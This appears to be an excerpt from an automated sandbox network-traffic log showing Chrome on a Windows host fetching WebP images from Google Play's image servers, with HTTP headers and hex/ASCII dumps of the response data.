                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: e1 d6 d8 cf f5 03 fa 0a c3 ca 81 62 9f 98 51 dd e8 38 d0 e6 59 4f 4a 51 56 af 88 12 7f cf f7 9a 92 94 07 7c 26 89 bf 5b 60 6c 1f 31 5a 58 4f 79 40 f2 37 42 af f2 b4 2d b2 33 77 8a c7 41 fe 0b a4 86 b9 52 03 c0 ed fa f3 fc 88 a7 3c 06 dc 30 62 75 ab bb 8d cf fa 7d 81 4e e6 f4 1e 82 36 b6 62 1e 43 94 a3 69 d0 47 6b 09 a9 3c 86 22 00 9d 2d 25 22 58 dc a5 46 6c 3f 61 0a 86 17 d6 d5 73 cc d9 4a 32 7e fd 1e 21 7d eb 17 3e 87 59 b8 07 e8 a6 87 ed 8f f3 28 7e a3 9d be 76 3d 51 cf c6 7d 87 8e 77 df b7 1a 0f 98 83 0c cb 43 a8 32 f8 9d 6e c2 ff ef dd 18 c5 e1 ee f2 69 cd e9 77 09 b4 cd b2 94 77 50 a4 3d 99 04 4b 97 48 18 65 59 56 d1 6f 9e 7e 50 8c 9d 16 16 85 f2 f5 90 f7 f0 7a 6d 26 30 d5 ba 45 2c de 7b 2b 2b e4 29 b9 e3 92 0e 47 1d aa 67 89 77 ee d5 43 28 13 30 74
                                                                                                                                                                                                                                Data Ascii: bQ8YOJQV|&[`l1ZXOy@7B-3wAR<0bu}N6bCiGk<"-%"XFl?asJ2~!}>Y(~v=Q}wC2niwwP=KHeYVo~Pzm&0E,{++)GgwC(0t
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: f4 90 bf dc 42 1f b4 1d a2 2f 28 b6 bc 34 8d f4 0b cb 8a 52 d0 d5 5e da d5 b4 e2 64 fa ce 49 08 a2 9d 9f 1e 3f 0e d3 f7 fd e1 a8 57 e3 a1 ed 32 2d be 00 9e 73 b9 cf 6a a0 87 d5 3f 8d df 9f 0f 12 89 4a 78 4f f4 df eb 1b 3d 78 42 36 1c 92 1d 79 f0 ff 57 c4 11 b4 0d 05 2b 09 be 96 52 7d 71 99 e7 00 1f 1a 98 47 91 66 ad 5d 0a c2 27 fe cd 48 91 cc 48 36 ec 49 d3 b8 b3 de 77 e7 6f 70 b1 f3 7d 60 76 2f 67 87 02 eb 81 5a 12 0b e8 2b 25 35 d7 90 d7 87 af 21 1f 90 e0 7f 2d 21 62 01 c5 ee e4 4d 41 10 25 32 54 07 64 61 ba 5e a9 62 91 a7 1e 6d fb a2 0c 40 d9 62 14 99 03 40 d1 32 b4 ef f8 77 78 bf 1e 4e 11 a8 9d ee 51 d9 4f a3 b1 34 6e c3 9a 27 05 12 8f a8 e7 0c 7c 46 10 41 d3 14 b8 0e 50 28 03 d2 d9 bb fb 29 c1 9c 34 8f 75 f2 46 b6 15 db 95 d2 92 b4 75 5f ca e1 6b af
                                                                                                                                                                                                                                Data Ascii: B/(4R^dI?W2-sj?JxO=xB6yW+R}qGf]'HH6Iwop}`v/gZ+%5!-!bMA%2Tda^bm@b@2wxNQO4n'|FAP()4uFu_k
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1390INData Raw: 84 bf aa d3 5c 1c 19 64 f8 7c e5 a6 ee 22 6e d6 f3 c5 4d 04 14 dd eb a2 72 ff 5c db 48 b7 fb 6a f5 e3 42 eb 9c 4c c0 39 02 b6 4f b9 d4 ed 96 f2 7f 40 39 6d 55 58 66 b2 76 cd a2 13 cc da 38 c4 40 10 12 92 dd 90 76 d7 d5 63 76 f4 7c e3 fd ec 6c 22 83 5e 43 51 10 e1 7f 0b 78 11 10 3c 66 ee 13 4a 2c b8 14 5f 5c df e5 7d 53 0b c1 7f be 09 74 7a 08 ad 86 71 60 7e 31 ed 8a 06 ee 65 3c ef a2 fe 28 aa 88 53 79 63 1f 36 81 d4 8e 2f 38 fc 44 81 51 41 c3 c0 9e bc ae c8 4c 44 cf 1a cc 68 d2 8d d1 77 6b 64 22 c8 d3 d1 bd c2 1c 9c 1f f5 9b 31 24 04 07 50 38 fe cf 04 67 e2 f7 60 fa b1 93 a6 04 c0 ea b5 94 32 ca 44 5a 26 9e 2e 91 7d 34 20 f4 6c 05 9d 38 15 7f 30 20 60 15 56 92 e7 25 16 53 08 fe 1d 36 8b 1d 46 34 ed cf 32 4f c4 7d 6b d0 07 15 3c 3b 22 ee 34 c9 bd 03 a3 65
                                                                                                                                                                                                                                Data Ascii: \d|"nMr\HjBL9O@9mUXfv8@vcv|l"^CQx<fJ,_\}Stzq`~1e<(Syc6/8DQALDhwkd"1$P8g`2DZ&.}4 l80 `V%S6F42O}k<;"4e
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC762INData Raw: 62 fa fd 4c 03 c9 8e 12 75 a4 2e 4e 40 14 9b 6f 09 81 fd a4 2b 51 bf 25 9c d9 1c d8 55 18 a7 35 e0 19 95 b6 26 a3 88 8f 40 d6 17 00 3c 99 71 74 7f 7f df ca 65 33 f3 95 b8 d4 d6 4f bb 7e 2d a8 83 a6 00 ff 09 43 f8 98 54 4b 7b ad 5e 39 57 d8 97 21 11 8a 6f f6 5c a3 ff 1f 40 d4 94 7d 6f 6b b0 64 a3 31 f5 a1 5f f0 e3 85 8a ac be f6 e5 76 70 b9 73 5d dc ad 2f 98 7c f7 8b 54 5b 96 a3 28 20 4f 28 48 a3 c8 dc 19 83 d9 3a 5f b7 dc 14 d5 f8 45 59 11 31 79 39 2c 66 46 f0 5d 90 45 69 81 3f a4 36 e1 a7 84 a1 03 ae c6 75 77 fc 49 89 06 6b 64 29 f3 38 6c e0 4e fa 3f df 96 9c 0b ed 60 70 1a 0a 7e 5b cc 9f 41 07 1b a0 4d cc 24 88 12 83 0a b1 e4 53 a7 70 21 dd ac a6 d4 59 0b 5a 4d 6e fe 92 ad df 49 db 7d ca d1 6b 72 2c 46 ce da ae ca cd a0 66 38 24 7f d6 59 1b 77 79 b9 5d
                                                                                                                                                                                                                                Data Ascii: bLu.N@o+Q%U5&@<qte3O~-CTK{^9W!o\@}okd1_vps]/|T[( O(H:_EY1y9,fF]Ei?6uwIkd)8lN?`p~[AM$Sp!YZMnI}kr,Ff8$Ywy]


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                100192.168.2.449984142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1109OUTGET /mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 148
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:18:01 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:18:01 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 2200
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC148INData Raw: 52 49 46 46 8c 00 00 00 57 45 42 50 56 50 38 4c 7f 00 00 00 2f 0f c0 03 10 85 d3 6a db 96 e5 dd e9 9f 00 5d 40 47 80 c4 04 16 35 31 81 bb 43 a2 ba 47 92 33 82 bb 3c e1 fd fe 77 86 88 23 ff 4f 00 a0 f0 b0 d3 7b 15 50 bd d9 ec 49 29 a5 89 88 88 9b 8d ee 54 1f 2f 5d a9 d8 f6 11 a9 b0 7d 1d 11 31 5e f0 8e 7c d1 b6 7e 13 7d d9 a4 42 d9 cd 42 25 c7 8c 4a 50 cb f6 25 d9 ac 5c b2 ce ac 25 c8 e8 b5 24 98 0d 4b fa 59 2c 22 e8 5c 1a 16 2f 3f 23 02 00
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/j]@G51CG3<w#O{PI)T/]}1^|~}BB%JP%\%$KY,"\/?#


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                101192.168.2.449987142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:41 UTC1097OUTGET /rbz2GOYtKwW-yK99VC_CBSUL_k2PWkkL4NfYubMEmKBCPbGuNxZb_pP7N2WAKZsQUw=w416-h235-rw HTTP/1.1
                                                                                                                                                                                                                                Host: play-lh.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://play.google.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC533INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                Access-Control-Expose-Headers: Content-Length
                                                                                                                                                                                                                                Content-Disposition: inline;filename="unnamed.webp"
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                Server: fife
                                                                                                                                                                                                                                Content-Length: 39178
                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:39:33 GMT
                                                                                                                                                                                                                                Expires: Mon, 30 Sep 2024 04:39:33 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=86400, no-transform
                                                                                                                                                                                                                                Age: 908
                                                                                                                                                                                                                                ETag: "v1"
                                                                                                                                                                                                                                Content-Type: image/webp
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC857INData Raw: 52 49 46 46 02 99 00 00 57 45 42 50 56 50 38 4c f6 98 00 00 2f 9f 81 32 10 4d 40 72 db 48 92 24 db 31 6b 44 fd ff c1 19 dd a8 59 cf 11 fd 9f 00 fd 3f b3 bc bf 2f 1e 45 ef 9d 3e 7c 1f 6b 54 75 48 0a 76 ba 6d bb 5b be 23 ec 2e a8 3a a6 db 76 77 d7 74 6b 6e a8 e8 90 64 83 97 73 fc 50 77 c6 00 23 49 9c 9b cf ee 6e cf 2c d6 c7 13 31 45 92 43 b5 d9 ee 9e b6 ed 39 22 b7 a9 27 00 23 6d 6f 85 96 e9 ee c5 76 c9 63 59 79 14 76 e9 5d 79 7b f0 c5 06 30 90 48 79 9b f7 2a be e6 0a d8 66 4d 1a a9 df 5f e7 6b 12 1f 40 b7 a4 58 2d f5 f8 6b 38 c7 91 dd 02 a2 9a 1e f8 92 16 30 53 91 88 40 52 2b 50 fe 8a a4 48 52 00 36 92 08 0e 7c 45 bb b2 1e 88 11 62 ed 2f 30 70 b0 8b 90 e7 ea 16 1e d4 91 00 49 83 0b a4 19 95 ef 30 d8 01 3b 22 85 b2 b9 4a 9a 96 6f 01 1c 80 44 49 55 05 5a ea
                                                                                                                                                                                                                                Data Ascii: RIFFWEBPVP8L/2M@rH$1kDY?/E>|kTuHvm[#.:vwtkndsPw#In,1EC9"'#movcYyv]y{0Hy*fM_k@X-k80S@R+PHR6|Eb/0pI0;"JoDIUZ
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: a3 59 e6 36 8c 8c 59 1a 1e e6 ff 97 db 91 63 cf 75 96 d1 13 6f 98 99 99 99 99 99 99 99 99 99 99 99 93 65 66 66 66 1e 08 33 2f a3 a7 78 df 73 ce 7b ce bd 7b 5e 57 c9 27 15 3a 8b 95 75 a4 91 ab f0 82 5d 85 17 ab a9 3c 45 78 bc e0 89 34 5a 0e 5a e1 64 19 ad 5b 58 a1 a9 c6 55 b0 1a 57 21 eb 14 d6 32 c3 1b 5c e6 ad e6 2d ac 25 57 4b 56 98 ac c5 2a 64 2d 56 b3 57 ba 5a a6 59 87 39 19 2d 56 a3 2b 59 5b 85 46 61 5a 72 52 2d 9f c2 53 2d 8d 16 de a9 96 5d 85 46 ff c2 53 85 46 0b 57 8b d5 b8 0a b9 f2 56 68 2d 5c 85 69 a6 5a 9a 6a b4 58 f9 16 5e 37 c1 71 15 72 e5 2c b9 9a 53 58 8b d5 c8 d2 91 ab 65 74 b5 64 05 ab 95 25 cb 55 78 c9 55 c8 0a d3 e8 16 de 6a 3a 37 53 85 ac 30 df 80 ab b0 ab 25 57 9e 2a 34 3a 52 3c 55 d8 c5 d5 62 35 ae c2 34 5a ac d6 c5 0d 4e 35 61 a6 d1
                                                                                                                                                                                                                                Data Ascii: Y6Ycuoefff3/xs{{^W':u]<Ex4ZZd[XUW!2\-%WKV*d-VWZY9-V+Y[FaZrR-S-]FSFWVh-\iZjX^7qr,SXetd%UxUj:7S0%W*4:R<Ub54ZN5a
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 03 80 4c 12 c7 11 87 d9 59 44 f0 f4 12 2d 9e 72 cc 9c 43 af f1 44 fc 74 f4 60 81 2c 9a 06 18 29 12 b5 8d 0c 3b 63 1d 6c 80 6d 59 20 39 47 8f 97 0c 9c 44 d2 6e 6e 9d 7d 3e dd dc 37 60 71 22 7c 04 0d 13 25 97 48 d0 74 4d 37 24 5c f9 01 c0 ea 2b f4 13 f4 e5 25 ba 41 30 a1 78 82 95 1a 97 84 5d 0e 31 38 7d 5b 58 9d db c5 1d 60 8c c0 a8 7b 3a 88 8f 90 44 1e de 3b c2 c0 c4 a5 2a cd 91 c7 39 7a b3 6c 4a 19 44 9e a3 da 01 a8 9f cf 15 89 60 4b 72 af c3 b5 1f b5 64 31 f4 e8 5d 4f e2 da c3 2c 80 44 74 bd 2a 24 6c ed bb 36 6c d8 c3 4d 47 b4 9e bd 0e 62 03 4e 06 78 72 ca 90 45 5c 31 26 b7 a1 3b 09 63 08 be 69 b8 b8 4d 5c 07 90 bf 46 5c 00 4e 1b 59 12 69 88 ca 43 c5 45 81 04 08 37 5e 50 82 13 4f 5b 02 56 c5 fd 46 23 63 74 22 90 19 b3 b4 9a dd b0 a1 71 4e 90 f0 cf ce 6a
                                                                                                                                                                                                                                Data Ascii: LYD-rCDt`,);clmY 9GDnn}>7`q"|%HtM7$\+%A0x]18}[X`{:D;*9zlJD`Krd1]O,Dt*$l6lMGbNxrE\1&;ciM\F\NYiCE7^PO[VF#ct"qNj
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: be 70 ed 81 76 8e eb 20 a8 6d 2b 9b 55 c5 6c 36 87 b4 05 a4 33 a8 f7 15 0b 73 1a ec 1a 02 7f b7 e7 38 d1 86 0f 30 3a f9 12 51 c1 b6 32 49 26 2a 78 5b 60 4d 54 a5 06 05 44 f9 ee 9b 6d b8 6d bb ed 85 3b 87 2c 9d ae 70 01 4f f0 ee 02 2f f0 82 52 43 cc 65 d1 04 bb f0 76 b2 5b 72 79 9c d1 6a b5 f6 8a 12 dc f6 f6 d4 83 a1 d6 ea 6e 1a 12 69 ab 67 8a 7f 3e 0d 00 f3 05 12 ef 4e 08 bd 0e f0 38 c4 45 0f 67 01 9e 76 41 92 99 15 81 2a 98 7f e9 f8 c9 12 62 b1 1b 1f 12 a0 ea d9 e1 02 b1 cb 6b 06 94 9a 1f d4 bb 05 40 d1 2d fd f3 85 e0 e2 51 fc aa 00 df b3 6f 64 8b dc 08 2e 0d c1 2f 03 d4 42 6c 68 d8 e0 92 31 f1 66 3d b8 d3 9f 25 60 bc 39 ed 1b a7 83 81 40 93 6a ac b1 6c 67 78 b3 1c 7b 82 c6 5e 55 60 bb 19 cc 75 53 59 b8 46 d4 3f dd 1e 38 05 51 ea 3d e9 3e b8 67 56 90 c5
                                                                                                                                                                                                                                Data Ascii: pv m+Ul63s80:Q2I&*x[`MTDmm;,pO/RCev[ryjnig>N8EgvA*bk@-Qod./Blh1f=%`9@jlgx{^U`uSYF?8Q=>gV
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: dd 95 3e 03 c8 8c 37 fb ee 52 68 f6 89 4f 39 f0 16 66 e2 8a c3 e4 d9 fa 8c 4e ed a9 b3 50 a6 95 0a b8 38 d1 b3 44 ce 38 ad a2 5c 1e c7 b0 82 a2 b6 d6 0a 15 fc 73 b3 9e e5 80 f4 12 64 39 5b 2e 4e 74 a7 ea f4 b1 3c a1 c5 2b 39 49 e2 4f 69 00 58 dc 9a e1 90 ad 0c 04 99 a8 01 82 89 14 50 3c 6a 71 e4 80 02 55 70 28 d1 b9 4f 6c 77 a7 f5 36 62 3b 21 5a 31 c1 77 1a b0 82 45 d5 a3 bb 7d a3 2c c9 e9 61 ab 40 7b bf d0 7e b0 a4 e4 31 81 0e c1 80 68 8f e4 69 31 dd 02 b4 56 01 26 84 4d ee 7b 35 f0 65 c1 92 c3 18 90 35 c4 a2 b2 f7 fe c3 4c bf e3 10 20 6a 3b c7 4f d1 58 33 76 49 66 27 24 de 4c 6a 28 8b 0b f0 fc 25 5f 8e 52 4f 4a 34 d2 42 83 b9 7a a1 f8 ba 1a bc 73 6a 7b 8b 3a 68 69 d1 fe 03 67 9d 4d 96 5a 48 59 45 43 c4 43 21 55 2b 59 01 3c 28 47 e2 5d 07 b7 70 5b d0 25
                                                                                                                                                                                                                                Data Ascii: >7RhO9fNP8D8\sd9[.Nt<+9IOiXP<jqUp(Olw6b;!Z1wE},a@{~1hi1V&M{5e5L j;OX3vIf'$Lj(%_ROJ4Bzsj{:higMZHYECC!U+Y<(G]p[%
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: ba 28 a4 c1 ca 03 c3 e3 f4 af 34 14 4e 76 69 7a f1 ef dc f3 4b da 8e d9 56 72 7c 7c f2 98 11 95 ec a3 f5 c6 b6 43 b3 60 9c 4b 1a 6b 19 e3 55 4e 58 ff 64 ad da 9d 9c 68 2f fc f5 31 57 3d eb 62 13 ce 2f f0 c5 ee 3f 9c 9f e1 ae 7a 0c 4e 17 a8 e0 a0 ba 55 27 11 38 29 4f b8 2a e0 d1 4a dd 9e 28 cb 00 eb 0d 90 ad be a3 9a 65 6d 0d 57 68 38 c3 51 6b 81 d1 db bb 58 31 fb 85 f3 0e 34 1f d6 0f dd 5e e7 d3 67 72 a2 8a 5c 2e 3f 7b 7f 07 29 9a e5 cc 40 7f 28 f6 7e 69 06 e4 8e db 66 ca ec 07 7c 9a 7d a7 26 11 d1 19 c2 9e 78 6b c2 09 27 7c 74 5f e4 7c b1 7b 44 da ae 0a 1a bc 37 48 2e 99 42 8d 3a d5 56 3a e7 02 f5 7f db 4d a9 35 88 f2 0e b7 d2 06 1c d0 e8 e2 d0 62 f9 eb f2 1f 16 c6 52 0e c7 2f 6a 70 4f 4c a9 22 1b 80 a8 7d 37 dd ca 23 4c 61 4e 25 af 68 e1 1e 63 28 f2 78
                                                                                                                                                                                                                                Data Ascii: (4NvizKVr||C`KkUNXdh/1W=b/?zNU'8)O*J(emWh8QkX14^gr\.?{)@(~if|}&xk'|t_|{D7H.B:V:M5bR/jpOL"}7#LaN%hc(x
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 5a 88 66 56 b8 5b 18 95 2c f0 d7 75 4f 84 5f e4 35 22 ba 19 19 58 05 00 0a 51 a3 a7 a5 5b c2 db 3e de c5 44 87 57 43 10 34 32 ed 3f a4 35 1e af 0a 36 be f0 0b 7b 6e 40 e0 39 63 ad 5a c7 3a 56 bc d4 fa c6 b8 c7 a4 77 da 96 50 6f 2e 5c ef 0d e7 f3 7d 9d 93 e2 c2 36 47 7c 20 6b 80 a1 59 c7 8a 86 37 f7 b2 4b 86 a6 6d 6d cc 92 d0 ce dd 22 e3 99 a2 f2 d0 51 32 dc 68 f9 2c 60 50 67 24 c8 1d 20 82 0b 65 6d 36 87 9c bb 76 ed 57 73 3a 22 6b e4 ec c1 94 ff 78 b7 be 3e 6f aa 62 a7 8f 6e 0c 53 31 0f 9b 3e c8 55 a9 d0 e4 c3 fc 1e ef 93 cd 27 da 00 66 41 aa d6 f0 e1 e8 e9 fe a8 1f 18 b5 c5 8a f1 bc 52 e0 20 93 19 d3 7c 00 a3 1c df a9 82 9f 00 bf 58 06 cf 34 69 32 d7 3a eb b1 5c c6 c1 fe 42 73 87 dd a7 bf 11 2f 5c 0b 83 52 db cd a6 f7 73 32 2b e5 08 37 1c 95 24 8e 58 4d
                                                                                                                                                                                                                                Data Ascii: ZfV[,uO_5"XQ[>DWC42?56{n@9cZ:VwPo.\}6G| kY7Kmm"Q2h,`Pg$ em6vWs:"kx>obnS1>U'fAR |X4i2:\Bs/\Rs2+7$XM
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: 63 00 e0 6e a7 f0 d0 51 32 f8 81 ab 74 07 06 f0 87 d0 58 a0 1c 11 32 59 9e 1c 69 be 03 0e 0a fe 4e bf 65 43 ab 31 d7 9d 42 2e 97 c7 58 11 2d 92 22 de 1b 79 bc 6c 21 96 1f 00 d4 af 29 89 0a 2d 6c 12 5d d2 93 fa 8b f6 dc f5 a7 dd e6 dc f1 1d 1f 7f 5f 73 d0 e9 ab 4f 2f de ab 58 b1 62 bc ef fa 1b 96 73 83 19 76 25 b4 12 ce 01 3e 41 09 1d 11 96 bf b4 69 b7 7a 1b e3 5a e1 45 da 0c 3e 9f 01 88 bd 02 27 29 66 53 2c b6 22 49 ff 90 5a 50 25 67 24 b9 27 cc 30 01 ab c1 52 0d 33 73 c8 08 1d 34 1b 50 d0 e1 91 89 c2 c2 5d 4e 18 66 76 b0 e6 a7 8f 49 49 10 e4 f0 98 30 b9 a2 c5 4a 80 0e 9f bc b2 5f 32 bf 12 27 59 6c d6 f8 76 71 2b 69 96 db 2d ad d6 6e a7 d5 6a ed 65 1f 87 73 67 87 20 cd ee e3 4a 5b 4f c8 b7 00 66 e9 87 15 ac de 8b 14 74 7b 64 2d 76 ab cf 9e 4d ca da e5 7a
                                                                                                                                                                                                                                Data Ascii: cnQ2tX2YiNeC1B.X-"yl!)-l]_sO/Xbsv%>AizZE>')fS,"IZP%g$'0R3s4P]NfvII0J_2'Ylvq+i-njesg J[Oft{d-vMz
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: ee 51 87 65 9c 39 c3 59 0f 14 a2 3b c2 04 00 27 a7 ae 78 99 a7 f6 a1 29 4f 14 2b 0e aa 55 f8 a4 87 98 51 47 2d 9a 30 44 69 d7 2c e4 44 4f 44 e4 53 b6 6a 5f b7 bf cc 64 7f 48 c3 89 81 56 ab 85 4c b2 a9 65 82 82 57 70 87 be 12 7f 58 f3 40 f5 ae df db 1a 6e 7c 9f d5 ae cb cd c9 ac c0 06 b4 60 fc ac cf 62 84 f0 9c 6c c9 04 99 9e 75 b7 5b f4 82 20 e8 05 04 a6 70 f8 e1 66 be 87 19 c4 72 59 77 b1 62 71 80 5e a3 90 e6 ef 37 0f ac 58 05 a0 4c 7e 20 2b 40 62 97 05 1d c0 61 ae 1c 40 a7 58 5d 58 4b 98 43 0c d2 16 b3 03 34 9e 02 66 05 ae a2 9b 43 03 3a eb 23 9a a1 56 14 dd bd 2f 26 cf 06 4d c8 74 fd 93 3f 09 64 8d a8 37 33 98 78 90 af 89 49 bd 88 a1 21 0a 16 64 56 4a 6e 8e 9f 63 6e e2 9d 90 58 e9 15 4a 8e 53 d6 9d 02 0b d1 d4 54 e1 24 b0 59 f6 86 bb 6b 45 e9 b3 e2 02
                                                                                                                                                                                                                                Data Ascii: Qe9Y;'x)O+UQG-0Di,DODSj_dHVLeWpX@n|`blu[ pfrYwbq^7XL~ +@ba@X]XKC4fC:#V/&Mt?d73xI!dVJncnXJST$YkE
                                                                                                                                                                                                                                2024-09-29 04:54:42 UTC1390INData Raw: eb f8 62 73 63 c6 4b 1e 8c 0a 44 34 aa 5a 13 75 76 39 2b 2f e0 79 fa b1 82 12 e5 39 e9 68 82 65 70 2e 22 72 1a 08 18 d0 60 30 1b ea da c5 6c e6 e5 b6 1a 5a 8e 15 32 2d d1 7e 41 54 79 0b 4a b0 22 44 df 87 10 a1 a2 db cb d6 b3 8d 3a dd e9 66 eb 70 d1 97 5a c9 00 37 4b 4b 5b 3d f7 58 17 7d 3f 8b 20 9e d0 fa 54 e7 4c 02 58 95 94 7e 51 bf ac 2a c9 5b ef ac 78 27 b6 12 05 24 8b f8 fc 33 b3 a8 ae 50 7a 34 68 fc 3d 51 35 59 9e f1 95 a3 1d ca ea 21 14 42 50 b0 e2 0e 53 fe a4 05 ea 80 55 b1 c5 b6 ba 44 95 a6 1f 8e ef f2 d5 90 77 d3 6c 73 fd 81 a1 01 10 09 2d 0a 16 3b 32 da 09 a8 d8 5b 52 de 26 01 a0 bf 07 3d 7b c1 23 ce 93 13 a7 ae 30 f5 36 2b da 05 95 be e6 e3 a7 41 48 e5 2b a0 cf a1 14 d3 61 be 54 47 30 9b 5e 20 f1 0e ab ab aa 54 95 c6 78 1f 18 fa d1 1e cd 50 b7
                                                                                                                                                                                                                                Data Ascii: bscKD4Zuv9+/y9hep."r`0lZ2-~ATyJ"D:fpZ7KK[=X}? TLX~Q*[x'$3Pz4h=Q5Y!BPSUDwls-;2[R&={#06+AH+aTG0^ TxP


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                102192.168.2.449988142.250.185.2144432992C:\Program Files\Google\Chrome\Application\chrome.exe
